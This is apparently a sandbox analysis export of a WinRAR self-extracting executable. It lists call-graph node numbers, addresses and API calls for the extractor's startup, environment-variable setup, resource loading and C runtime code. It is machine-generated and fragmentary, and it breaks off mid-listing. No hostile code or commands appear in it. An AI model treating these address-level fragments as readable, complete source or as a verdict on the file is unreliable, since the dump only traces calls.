23124->23125 23126 46567d 23125->23126 23288 468558 23126->23288 23128 465686 23129 45d6fb 23128->23129 23292 4688e3 38 API calls 23128->23292 23131 45c131 23129->23131 23413 44f353 23131->23413 23135 45c150 23462 459036 23135->23462 23137 45c159 23466 450722 GetCPInfo 23137->23466 23139 45c163 ___scrt_fastfail 23140 45c176 GetCommandLineW 23139->23140 23141 45c185 23140->23141 23142 45c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23140->23142 23469 45a8d4 23141->23469 23143 443f5b _swprintf 51 API calls 23142->23143 23145 45c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 23143->23145 23482 459a76 LoadBitmapW 23145->23482 23148 45c193 OpenFileMappingW 23152 45c1f3 CloseHandle 23148->23152 23153 45c1ac MapViewOfFile 23148->23153 23149 45c1fd 23476 45be0a 23149->23476 23152->23142 23155 45c1bd __vswprintf_c_l 23153->23155 23156 45c1ea UnmapViewOfFile 23153->23156 23157 45be0a 2 API calls 23155->23157 23156->23152 23159 45c1d9 23157->23159 23158 45c2b3 23160 45c2c5 DialogBoxParamW 23158->23160 23159->23156 23161 45c2ff 23160->23161 23162 45c311 Sleep 23161->23162 23163 45c318 23161->23163 23162->23163 23166 45c326 23163->23166 23507 459237 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23163->23507 23165 45c345 DeleteObject 23167 45c35c DeleteObject 23165->23167 23168 45c35f 23165->23168 23166->23165 23167->23168 23169 45c390 23168->23169 23170 45c3a2 23168->23170 23508 45be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23169->23508 23505 45909e 23170->23505 23172 45c396 CloseHandle 23172->23170 23174 45c3dc 23175 464a9b GetModuleHandleW 23174->23175 23176 45d70e 23175->23176 23176->23098 23177 464bc4 23176->23177 23616 464941 23177->23616 23180->23080 23181->23094 23182->23100 23183->23086 23184->23106 23186 460b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23185->23186 23198 461c0e 23186->23198 23189 460b79 23189->23108 23191 460b81 23192 460b8c 23191->23192 23212 461c4a DeleteCriticalSection 23191->23212 23192->23108 23240 468ac5 23194->23240 23197 460b8f 8 API calls 3 library calls 23197->23109 23200 461c17 23198->23200 23201 461c40 23200->23201 23202 460b75 23200->23202 23213 461e85 23200->23213 23218 461c4a DeleteCriticalSection 23201->23218 23202->23189 23204 460ca6 23202->23204 23233 461d9a 23204->23233 23206 460cb0 23211 460cbb 23206->23211 23238 461e48 6 API calls try_get_function 23206->23238 23208 460cc9 23209 460cd6 23208->23209 23239 460cd9 6 API calls ___vcrt_FlsFree 23208->23239 23209->23191 23211->23191 23212->23189 23219 461c79 23213->23219 23216 461ebc InitializeCriticalSectionAndSpinCount 23217 461ea8 23216->23217 23217->23200 23218->23202 23220 461cad 23219->23220 23223 461ca9 23219->23223 23220->23216 23220->23217 23222 461cd9 GetProcAddress 23224 461ce9 __crt_fast_encode_pointer 23222->23224 23223->23220 23225 461ccd 23223->23225 23226 461d19 23223->23226 23224->23220 23225->23220 23225->23222 23227 461d36 23226->23227 23228 461d41 LoadLibraryExW 23226->23228 23227->23223 23229 461d75 23228->23229 23230 461d5d GetLastError 23228->23230 23229->23227 23232 461d8c FreeLibrary 23229->23232 23230->23229 23231 461d68 LoadLibraryExW 23230->23231 23231->23229 23232->23227 23234 461c79 try_get_function 5 API calls 23233->23234 23235 461db4 23234->23235 23236 461dcc TlsAlloc 23235->23236 23237 461dbd 23235->23237 23237->23206 23238->23208 23239->23211 23241 468ae2 23240->23241 23244 468ade 23240->23244 23241->23244 23246 4671c0 23241->23246 23242 45d783 TranslatorGuardHandler 5 API calls 23243 45d14d 23242->23243 23243->23112 23243->23197 23244->23242 23247 4671cc ___scrt_is_nonwritable_in_current_image 23246->23247 23258 4676d6 EnterCriticalSection 23247->23258 23249 4671d3 23259 468f93 23249->23259 23251 4671e2 23257 4671f1 23251->23257 23272 467054 29 API calls 23251->23272 23254 467202 ___scrt_is_nonwritable_in_current_image 23254->23241 23255 4671ec 23273 46710a GetStdHandle GetFileType 23255->23273 23274 46720d LeaveCriticalSection _abort 23257->23274 23258->23249 23260 468f9f ___scrt_is_nonwritable_in_current_image 23259->23260 23261 468fc3 23260->23261 23262 468fac 23260->23262 23275 4676d6 EnterCriticalSection 23261->23275 23283 465e3e 20 API calls __dosmaperr 23262->23283 23265 468fcf 23271 468ffb 23265->23271 23276 468ee4 23265->23276 23266 468fb1 23284 465d1d 26 API calls pre_c_initialization 23266->23284 23269 468fbb ___scrt_is_nonwritable_in_current_image 23269->23251 23285 469022 LeaveCriticalSection _abort 23271->23285 23272->23255 23273->23257 23274->23254 23275->23265 23277 465a8d __dosmaperr 20 API calls 23276->23277 23279 468ef6 23277->23279 23278 468f03 23280 4659c2 _free 20 API calls 23278->23280 23279->23278 23281 4679a7 11 API calls 23279->23281 23282 468f55 23280->23282 23281->23279 23282->23265 23283->23266 23284->23269 23285->23269 23287 45deb7 23286->23287 23287->23124 23287->23287 23289 46856a 23288->23289 23290 468561 23288->23290 23289->23128 23293 468457 23290->23293 23292->23128 23294 46631f pre_c_initialization 38 API calls 23293->23294 23295 468464 23294->23295 23313 468576 23295->23313 23297 46846c 23322 4681eb 23297->23322 23300 468483 23300->23289 23301 4659fc __vswprintf_c_l 21 API calls 23302 468494 23301->23302 23303 4684c6 23302->23303 23329 468618 23302->23329 23306 4659c2 _free 20 API calls 23303->23306 23306->23300 23307 4684c1 23339 465e3e 20 API calls __dosmaperr 23307->23339 23309 46850a 23309->23303 23340 4680c1 26 API calls 23309->23340 23310 4684de 23310->23309 23311 4659c2 _free 20 API calls 23310->23311 23311->23309 23314 468582 ___scrt_is_nonwritable_in_current_image 23313->23314 23315 46631f pre_c_initialization 38 API calls 23314->23315 23320 46858c 23315->23320 23317 468610 ___scrt_is_nonwritable_in_current_image 23317->23297 23320->23317 23321 4659c2 _free 20 API calls 23320->23321 23341 465a4a 38 API calls _abort 23320->23341 23342 4676d6 EnterCriticalSection 23320->23342 23343 468607 LeaveCriticalSection _abort 23320->23343 23321->23320 23323 462636 __fassign 38 API calls 23322->23323 23324 4681fd 23323->23324 23325 46821e 23324->23325 23326 46820c GetOEMCP 23324->23326 23327 468223 GetACP 23325->23327 23328 468235 23325->23328 23326->23328 23327->23328 23328->23300 23328->23301 23330 4681eb 40 API calls 23329->23330 23331 468637 23330->23331 23334 468688 IsValidCodePage 23331->23334 23336 46863e 23331->23336 23338 4686ad ___scrt_fastfail 23331->23338 23332 45d783 TranslatorGuardHandler 5 API calls 23333 4684b9 23332->23333 23333->23307 23333->23310 23335 46869a GetCPInfo 23334->23335 23334->23336 23335->23336 23335->23338 23336->23332 23344 4682c3 GetCPInfo 23338->23344 23339->23303 23340->23303 23342->23320 23343->23320 23345 4683a7 23344->23345 23349 4682fd 23344->23349 23348 45d783 TranslatorGuardHandler 5 API calls 23345->23348 23351 468453 23348->23351 23354 4693f3 23349->23354 23351->23336 23353 4675cb __vswprintf_c_l 43 API calls 23353->23345 23355 462636 __fassign 38 API calls 23354->23355 23356 469413 MultiByteToWideChar 23355->23356 23358 469451 23356->23358 23365 4694e9 23356->23365 23360 469472 __vswprintf_c_l ___scrt_fastfail 23358->23360 23361 4659fc __vswprintf_c_l 21 API calls 23358->23361 23359 45d783 TranslatorGuardHandler 5 API calls 23362 46835e 23359->23362 23363 4694e3 23360->23363 23366 4694b7 MultiByteToWideChar 23360->23366 23361->23360 23368 4675cb 23362->23368 23373 467616 20 API calls _free 23363->23373 23365->23359 23366->23363 23367 4694d3 GetStringTypeW 23366->23367 23367->23363 23369 462636 __fassign 38 API calls 23368->23369 23370 4675de 23369->23370 23374 4673ae 23370->23374 23373->23365 23375 4673c9 __vswprintf_c_l 23374->23375 23376 4673ef MultiByteToWideChar 23375->23376 23377 4675a3 23376->23377 23378 467419 23376->23378 23379 45d783 TranslatorGuardHandler 5 API calls 23377->23379 23383 4659fc __vswprintf_c_l 21 API calls 23378->23383 23385 46743a __vswprintf_c_l 23378->23385 23380 4675b6 23379->23380 23380->23353 23381 467483 MultiByteToWideChar 23382 4674ef 23381->23382 23384 46749c 23381->23384 23410 467616 20 API calls _free 23382->23410 23383->23385 23401 467a09 23384->23401 23385->23381 23385->23382 23389 4674c6 23389->23382 23392 467a09 __vswprintf_c_l 11 API calls 23389->23392 23390 4674fe 23391 4659fc __vswprintf_c_l 21 API calls 23390->23391 23395 46751f __vswprintf_c_l 23390->23395 23391->23395 23392->23382 23393 467594 23409 467616 20 API calls _free 23393->23409 23395->23393 23396 467a09 __vswprintf_c_l 11 API calls 23395->23396 23397 467573 23396->23397 23397->23393 23398 467582 WideCharToMultiByte 23397->23398 23398->23393 23399 4675c2 23398->23399 23411 467616 20 API calls _free 23399->23411 23402 467735 __dosmaperr 5 API calls 23401->23402 23403 467a30 23402->23403 23406 467a39 23403->23406 23412 467a91 10 API calls 3 library calls 23403->23412 23405 467a79 LCMapStringW 23405->23406 23407 45d783 TranslatorGuardHandler 5 API calls 23406->23407 23408 4674b3 23407->23408 23408->23382 23408->23389 23408->23390 23409->23382 23410->23377 23411->23382 23412->23405 23414 45cec0 23413->23414 23415 44f35d GetModuleHandleW 23414->23415 23416 44f377 GetProcAddress 23415->23416 23417 44f3c8 23415->23417 23419 44f3a0 GetProcAddress 23416->23419 23420 44f390 23416->23420 23418 44f6fd GetModuleFileNameW 23417->23418 23515 46462a 42 API calls __vswprintf_c_l 23417->23515 23433 44f718 23418->23433 23419->23417 23422 44f3ac 23419->23422 23420->23419 23422->23417 23423 44f63b 23423->23418 23424 44f646 GetModuleFileNameW CreateFileW 23423->23424 23425 44f675 SetFilePointer 23424->23425 23426 44f6f1 CloseHandle 23424->23426 23425->23426 23427 44f685 ReadFile 23425->23427 23426->23418 23427->23426 23430 44f6a4 23427->23430 23428 44a8e0 GetVersionExW 23428->23433 23430->23426 23432 44f309 2 API calls 23430->23432 23431 44f74d CompareStringW 23431->23433 23432->23430 23433->23428 23433->23431 23434 44f797 23433->23434 23435 44f783 GetFileAttributesW 23433->23435 23509 44f309 23433->23509 23436 44f7a4 23434->23436 23439 44f7d6 23434->23439 23435->23433 23435->23434 23438 44f7bc GetFileAttributesW 23436->23438 23440 44f7d0 23436->23440 23437 44f8e5 23461 458b8e GetCurrentDirectoryW 23437->23461 23438->23436 23438->23440 23439->23437 23441 44a8e0 GetVersionExW 23439->23441 23440->23439 23442 44f7f0 23441->23442 23443 44f7f7 23442->23443 23444 44f85d 23442->23444 23445 44f309 2 API calls 23443->23445 23446 443f5b _swprintf 51 API calls 23444->23446 23447 44f801 23445->23447 23448 44f885 AllocConsole 23446->23448 23451 44f309 2 API calls 23447->23451 23449 44f892 GetCurrentProcessId AttachConsole 23448->23449 23450 44f8dd ExitProcess 23448->23450 23516 4620b3 23449->23516 23453 44f80b 23451->23453 23455 44d142 54 API calls 23453->23455 23454 44f8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 23454->23450 23456 44f826 23455->23456 23457 443f5b _swprintf 51 API calls 23456->23457 23458 44f839 23457->23458 23459 44d142 54 API calls 23458->23459 23460 44f848 23459->23460 23460->23450 23461->23135 23463 44f309 2 API calls 23462->23463 23464 45904a OleInitialize 23463->23464 23465 45906d GdiplusStartup SHGetMalloc 23464->23465 23465->23137 23467 450746 IsDBCSLeadByte 23466->23467 23467->23467 23468 45075e 23467->23468 23468->23139 23475 45a8de 23469->23475 23470 45a9f4 23470->23148 23470->23149 23471 45a926 CharUpperW 23471->23475 23472 45a9a9 CharUpperW 23472->23475 23474 45a94d CharUpperW 23474->23475 23475->23470 23475->23471 23475->23472 23475->23474 23518 44dfde 73 API calls ___scrt_fastfail 23475->23518 23477 45cec0 23476->23477 23478 45be17 SetEnvironmentVariableW 23477->23478 23480 45be3a 23478->23480 23479 45be62 23479->23142 23480->23479 23481 45be56 SetEnvironmentVariableW 23480->23481 23481->23479 23483 459a97 23482->23483 23484 459aa0 GetObjectW 23482->23484 23519 458bd0 FindResourceW 23483->23519 23485 458ac0 6 API calls 23484->23485 23487 459ab2 23485->23487 23489 459af3 23487->23489 23490 459ad3 23487->23490 23491 458bd0 13 API calls 23487->23491 23500 44caa7 23489->23500 23535 458b22 GetDC GetDeviceCaps ReleaseDC 23490->23535 23493 459ac8 23491->23493 23493->23490 23495 459ace DeleteObject 23493->23495 23494 459adb 23536 458adf GetDC GetDeviceCaps ReleaseDC 23494->23536 23495->23490 23497 459ae4 23537 458cf3 8 API calls ___scrt_fastfail 23497->23537 23499 459aeb DeleteObject 23499->23489 23546 44cacc 23500->23546 23504 44caba 23504->23158 23506 4590c4 GdiplusShutdown CoUninitialize 23505->23506 23506->23174 23507->23166 23508->23172 23510 45cec0 23509->23510 23511 44f316 GetSystemDirectoryW 23510->23511 23512 44f34c 23511->23512 23513 44f32e 23511->23513 23512->23433 23514 44f33f LoadLibraryW 23513->23514 23514->23512 23515->23423 23517 4620bb 23516->23517 23517->23454 23517->23517 23518->23475 23520 458bf1 SizeofResource 23519->23520 23523 458c23 23519->23523 23521 458c05 LoadResource 23520->23521 23520->23523 23522 458c16 LockResource 23521->23522 23521->23523 23522->23523 23524 458c2a GlobalAlloc 23522->23524 23523->23484 23524->23523 23525 458c41 GlobalLock 23524->23525 23526 458c4c __vswprintf_c_l 23525->23526 23527 458cb8 GlobalFree 23525->23527 23528 458c54 CreateStreamOnHGlobal 23526->23528 23527->23523 23529 458cb1 GlobalUnlock 23528->23529 23530 458c6c 23528->23530 23529->23527 23538 458b65 GdipAlloc 23530->23538 23533 458c90 GdipCreateHBITMAPFromBitmap 23534 458ca6 23533->23534 23534->23529 23535->23494 23536->23497 23537->23499 23539 458b77 23538->23539 23540 458b84 23538->23540 23542 458924 23539->23542 23540->23529 23540->23533 23540->23534 23543 458945 GdipCreateBitmapFromStreamICM 23542->23543 23544 45894c GdipCreateBitmapFromStream 23542->23544 23545 458951 23543->23545 23544->23545 23545->23540 23547 44cad6 _wcschr __EH_prolog 23546->23547 23548 44cb02 GetModuleFileNameW 23547->23548 23549 44cb33 23547->23549 23550 44cb1c 23548->23550 23569 44973d 23549->23569 23550->23549 23552 449437 72 API calls 23553 44cab3 23552->23553 23565 44ce48 GetModuleHandleW FindResourceW 23553->23565 23554 4499e0 70 API calls 23557 44ccb9 new 23554->23557 23558 44990d 73 API calls 23557->23558 23564 44cce9 23557->23564 23562 44ccdf new 23558->23562 23560 44cb63 23561 44cc9f 23560->23561 23560->23564 23578 449aeb 23560->23578 23586 44990d 23560->23586 23594 4499e0 23560->23594 23561->23554 23561->23564 23562->23564 23599 4506e9 MultiByteToWideChar 23562->23599 23564->23552 23566 44ce76 23565->23566 23568 44ce70 23565->23568 23567 44c91f 52 API calls 23566->23567 23567->23568 23568->23504 23570 449747 23569->23570 23571 44979d CreateFileW 23570->23571 23572 44981b 23571->23572 23573 4497ca GetLastError 23571->23573 23572->23560 23574 44b275 2 API calls 23573->23574 23575 4497ea 23574->23575 23575->23572 23576 4497ee CreateFileW GetLastError 23575->23576 23577 449812 23576->23577 23577->23572 23579 449afe 23578->23579 23580 449b0f SetFilePointer 23578->23580 23582 449b48 23579->23582 23600 446eae 68 API calls 23579->23600 23581 449b2d GetLastError 23580->23581 23580->23582 23581->23582 23584 449b37 23581->23584 23582->23560 23584->23582 23601 446eae 68 API calls 23584->23601 23589 449924 23586->23589 23588 449985 23588->23560 23589->23588 23590 449977 23589->23590 23592 449987 23589->23592 23602 449613 23589->23602 23614 446e74 68 API calls 23590->23614 23592->23588 23593 449613 5 API calls 23592->23593 23593->23592 23595 449897 2 API calls 23594->23595 23596 4499f4 23595->23596 23597 449a0b 23596->23597 23615 446eae 68 API calls 23596->23615 23597->23560 23599->23564 23600->23580 23601->23582 23603 449621 GetStdHandle 23602->23603 23604 44962c ReadFile 23602->23604 23603->23604 23605 449645 23604->23605 23613 449665 23604->23613 23606 44971a GetFileType 23605->23606 23607 44964c 23606->23607 23608 44967c 23607->23608 23609 44966d GetLastError 23607->23609 23612 44965a 23607->23612 23610 44968c GetLastError 23608->23610 23608->23613 23609->23608 23609->23613 23610->23612 23610->23613 23611 449613 GetFileType 23611->23613 23612->23611 23613->23589 23614->23588 23615->23597 23617 46494d _GetRangeOfTrysToCheck 23616->23617 23618 464965 23617->23618 23619 464a9b _abort GetModuleHandleW 23617->23619 23638 4676d6 EnterCriticalSection 23618->23638 23621 464959 23619->23621 23621->23618 23650 464adf GetModuleHandleExW 23621->23650 23625 4649e2 23628 4649fa 23625->23628 23633 4656d0 _abort 5 API calls 23625->23633 23626 464a54 23659 46f149 5 API calls TranslatorGuardHandler 23626->23659 23627 464a28 23642 464a5a 23627->23642 23634 4656d0 _abort 5 API calls 23628->23634 23629 46496d 23629->23625 23637 464a0b 23629->23637 23658 465447 20 API calls _abort 23629->23658 23633->23628 23634->23637 23639 464a4b 23637->23639 23638->23629 23660 46771e LeaveCriticalSection 23639->23660 23641 464a24 23641->23626 23641->23627 23661 467b13 23642->23661 23645 464a88 23648 464adf _abort 8 API calls 23645->23648 23646 464a68 GetPEB 23646->23645 23647 464a78 GetCurrentProcess TerminateProcess 23646->23647 23647->23645 23649 464a90 ExitProcess 23648->23649 23651 464b2c 23650->23651 23652 464b09 GetProcAddress 23650->23652 23654 464b32 FreeLibrary 23651->23654 23655 464b3b 23651->23655 23653 464b1e 23652->23653 23653->23651 23654->23655 23656 45d783 TranslatorGuardHandler 5 API calls 23655->23656 23657 464b45 23656->23657 23657->23618 23658->23625 23660->23641 23662 467b38 23661->23662 23666 467b2e 23661->23666 23663 467735 __dosmaperr 5 API calls 23662->23663 23663->23666 23664 45d783 TranslatorGuardHandler 5 API calls 23665 464a64 23664->23665 23665->23645 23665->23646 23666->23664 23802 441019 29 API calls pre_c_initialization 23686 45c726 19 API calls ___delayLoadHelper2@8 23803 45b820 72 API calls 23841 459123 73 API calls 23701 466428 23709 46784c 23701->23709 23705 466444 23706 466451 23705->23706 23717 466454 11 API calls 23705->23717 23708 46643c 23710 467735 __dosmaperr 5 API calls 23709->23710 23711 467873 23710->23711 23712 46788b TlsAlloc 23711->23712 23714 46787c 23711->23714 23712->23714 23713 45d783 TranslatorGuardHandler 5 API calls 23715 466432 23713->23715 23714->23713 23715->23708 23716 4663a3 20 API calls 2 library calls 23715->23716 23716->23705 23717->23708 23842 465536 8 API calls ___vcrt_uninitialize 23843 45a537 93 API calls _swprintf 23895 45d736 20 API calls 23808 46f830 DeleteCriticalSection 23845 450d3a 26 API calls std::bad_exception::bad_exception 21899 45c7c0 21900 45c791 21899->21900 21900->21899 21902 45cabc 21900->21902 21930 45c7ca 21902->21930 21904 45cad6 21905 45cb33 21904->21905 21916 45cb57 21904->21916 21941 45ca3a 11 API calls 3 library calls 21905->21941 21907 45cb3e RaiseException 21908 45cd2c 21907->21908 21945 45d783 21908->21945 21909 45cbcf LoadLibraryExA 21911 45cc30 21909->21911 21912 45cbe2 GetLastError 21909->21912 21915 45cc42 21911->21915 21917 45cc3b FreeLibrary 21911->21917 21918 45cbf5 21912->21918 21919 45cc0b 21912->21919 21913 45cd3b 21913->21900 21914 45cca0 GetProcAddress 21921 45ccb0 GetLastError 21914->21921 21925 45ccfe 21914->21925 21915->21914 21915->21925 21916->21909 21916->21911 21916->21915 21916->21925 21917->21915 21918->21911 21918->21919 21942 45ca3a 11 API calls 3 library calls 21919->21942 21923 45ccc3 21921->21923 21922 45cc16 RaiseException 21922->21908 21923->21925 21943 45ca3a 11 API calls 3 library calls 21923->21943 21944 45ca3a 11 API calls 3 library calls 21925->21944 21927 45cce4 RaiseException 21928 45c7ca ___delayLoadHelper2@8 11 API calls 21927->21928 21929 45ccfb 21928->21929 21929->21925 21931 45c7d6 21930->21931 21932 45c7fc 21930->21932 21952 45c878 8 API calls 2 library calls 21931->21952 21932->21904 21934 45c7db 21935 45c7f7 21934->21935 21953 45c9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 21934->21953 21954 45c7fd GetModuleHandleW GetProcAddress GetProcAddress 21935->21954 21938 45d783 TranslatorGuardHandler 5 API calls 21939 45cab8 21938->21939 21939->21904 21940 45ca87 21940->21938 21941->21907 21942->21922 21943->21927 21944->21908 21946 45d78c 21945->21946 21947 45d78e IsProcessorFeaturePresent 21945->21947 21946->21913 21949 45ddb8 21947->21949 21955 45dd7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21949->21955 21951 45de9b 21951->21913 21952->21934 21953->21935 21954->21940 21955->21951 23896 4563c3 115 API calls 23871 45aa99 101 API calls 4 library calls 23872 467ecd 6 API calls TranslatorGuardHandler 23035 449bc8 23036 449bd4 23035->23036 23037 449bdb 23035->23037 23038 449be1 GetStdHandle 23037->23038 23040 449bec 23037->23040 23038->23040 23039 449c41 WriteFile 23039->23040 23040->23036 23040->23039 23041 449c11 WriteFile 23040->23041 23042 449c0c 23040->23042 23044 449cb4 23040->23044 23046 446d5a 56 API calls 23040->23046 23041->23040 23041->23042 23042->23040 23042->23041 23047 446f67 68 API calls 23044->23047 23046->23040 23047->23036 23898 466fcb 71 API calls _free 23873 4586cb 22 API calls 23811 457cd5 GetClientRect 23874 464ed4 55 API calls _free 23667 45c0d0 23668 45c0dd 23667->23668 23669 44d142 54 API calls 23668->23669 23670 45c0f1 23669->23670 23671 443f5b _swprintf 51 API calls 23670->23671 23672 45c103 SetDlgItemTextW 23671->23672 23675 45991e PeekMessageW 23672->23675 23676 459939 GetMessageW TranslateMessage DispatchMessageW 23675->23676 23677 45995a 23675->23677 23676->23677 23815 45aa99 96 API calls 4 library calls 23899 464bda 52 API calls 3 library calls 23846 44ddda FreeLibrary 23817 46c0e4 51 API calls 23876 4416e3 79 API calls 23902 45c3ea 19 API calls ___delayLoadHelper2@8 23849 45d5ff 27 API calls pre_c_initialization 23821 4688fb GetCommandLineA GetCommandLineW 23781 4418fb 127 API calls __EH_prolog 23850 459584 GetDlgItem EnableWindow ShowWindow SendMessageW 23824 449481 72 API calls 21956 45c782 21957 45c730 21956->21957 21958 45cabc ___delayLoadHelper2@8 19 API calls 21957->21958 21958->21957 21959 441383 75 API calls 3 library calls 23049 467695 23050 4676a0 23049->23050 23052 4676c9 23050->23052 23054 4676c5 23050->23054 23055 4679a7 23050->23055 23062 4676ed DeleteCriticalSection 23052->23062 23063 467735 23055->23063 23058 4679ec InitializeCriticalSectionAndSpinCount 23059 4679d7 23058->23059 23060 45d783 TranslatorGuardHandler 5 API calls 23059->23060 23061 467a03 23060->23061 23061->23050 23062->23054 23066 467761 23063->23066 23068 467765 23063->23068 23064 467785 23067 467791 GetProcAddress 23064->23067 23064->23068 23066->23064 23066->23068 23070 4677d1 23066->23070 23069 4677a1 __crt_fast_encode_pointer 23067->23069 23068->23058 23068->23059 23069->23068 23071 4677f2 LoadLibraryExW 23070->23071 23075 4677e7 23070->23075 23072 467827 23071->23072 23073 46780f GetLastError 23071->23073 23072->23075 23076 46783e FreeLibrary 23072->23076 23073->23072 23074 46781a LoadLibraryExW 23073->23074 23074->23072 23075->23066 23076->23075 23882 460e9d 48 API calls 23851 45899a GdipCloneImage GdipAlloc 23883 447a9b GetCurrentProcess GetLastError CloseHandle 23885 468aaa GetProcessHeap 23688 4410a9 23693 445b35 23688->23693 23694 445b3f __EH_prolog 23693->23694 23695 44ac66 75 API calls 23694->23695 23696 445b4b 23695->23696 23700 445d2a GetCurrentProcess GetProcessAffinityMask 23696->23700 23909 45aa99 91 API calls 3 library calls 23910 454fb5 120 API calls __vswprintf_c_l 23911 45e7b0 51 API calls 2 library calls 23779 468abc 31 API calls TranslatorGuardHandler

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0044F353: GetModuleHandleW.KERNEL32 ref: 0044F36B
                                                                                                                • Part of subcall function 0044F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0044F383
                                                                                                                • Part of subcall function 0044F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0044F3A6
                                                                                                                • Part of subcall function 00458B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00458B96
                                                                                                                • Part of subcall function 00459036: OleInitialize.OLE32(00000000), ref: 0045904F
                                                                                                                • Part of subcall function 00459036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00459086
                                                                                                                • Part of subcall function 00459036: SHGetMalloc.SHELL32(004820E8), ref: 00459090
                                                                                                                • Part of subcall function 00450722: GetCPInfo.KERNEL32(00000000,?), ref: 00450733
                                                                                                                • Part of subcall function 00450722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00450747
                                                                                                              • GetCommandLineW.KERNEL32 ref: 0045C179
                                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0045C1A0
                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0045C1B1
                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0045C1EB
                                                                                                                • Part of subcall function 0045BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0045BE20
                                                                                                                • Part of subcall function 0045BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0045BE5C
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0045C1F4
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00497938,00000800), ref: 0045C20F
                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00497938), ref: 0045C221
                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0045C228
                                                                                                              • _swprintf.LIBCMT ref: 0045C267
                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0045C279
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0045C27C
                                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 0045C293
                                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 0045C2E4
                                                                                                              • Sleep.KERNEL32(?), ref: 0045C312
                                                                                                              • DeleteObject.GDI32 ref: 0045C351
                                                                                                              • DeleteObject.GDI32(?), ref: 0045C35D
                                                                                                                • Part of subcall function 0045A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 0045A92C
                                                                                                                • Part of subcall function 0045A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0045A953
                                                                                                              • CloseHandle.KERNEL32 ref: 0045C39C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$*aH$*xI$8yI$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                              • API String ID: 985665271-3696633381
                                                                                                              • Opcode ID: 4538ef2ba3ef40ac4701e751b0f0a402a45a2ae39764dff36d6f9218ee0d1e35
                                                                                                              • Instruction ID: 0654cdc585a7b554a923af4ab1ed081bf9b19205256226bf5765116ce4b76dae
                                                                                                              • Opcode Fuzzy Hash: 4538ef2ba3ef40ac4701e751b0f0a402a45a2ae39764dff36d6f9218ee0d1e35
                                                                                                              • Instruction Fuzzy Hash: 6461C771905314AED310AB65AC8AF6B3BA8EB44755F04443FFD44922A3DB7C9C48C7AD

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 598 458bd0-458beb FindResourceW 599 458cc6-458cc8 598->599 600 458bf1-458c03 SizeofResource 598->600 601 458c05-458c14 LoadResource 600->601 602 458c23-458c25 600->602 601->602 603 458c16-458c21 LockResource 601->603 604 458cc5 602->604 603->602 605 458c2a-458c3f GlobalAlloc 603->605 604->599 606 458c41-458c4a GlobalLock 605->606 607 458cbf-458cc4 605->607 608 458c4c-458c6a call 45e000 CreateStreamOnHGlobal 606->608 609 458cb8-458cb9 GlobalFree 606->609 607->604 612 458cb1-458cb2 GlobalUnlock 608->612 613 458c6c-458c84 call 458b65 608->613 609->607 612->609 613->612 617 458c86-458c8e 613->617 618 458c90-458ca4 GdipCreateHBITMAPFromBitmap 617->618 619 458ca9-458cad 617->619 618->619 620 458ca6 618->620 619->612 620->619
                                                                                                              APIs
                                                                                                              • FindResourceW.KERNELBASE(00000066,PNG,?,?,00459AC8,00000066), ref: 00458BE1
                                                                                                              • SizeofResource.KERNEL32(00000000,75295780,?,?,00459AC8,00000066), ref: 00458BF9
                                                                                                              • LoadResource.KERNEL32(00000000,?,?,00459AC8,00000066), ref: 00458C0C
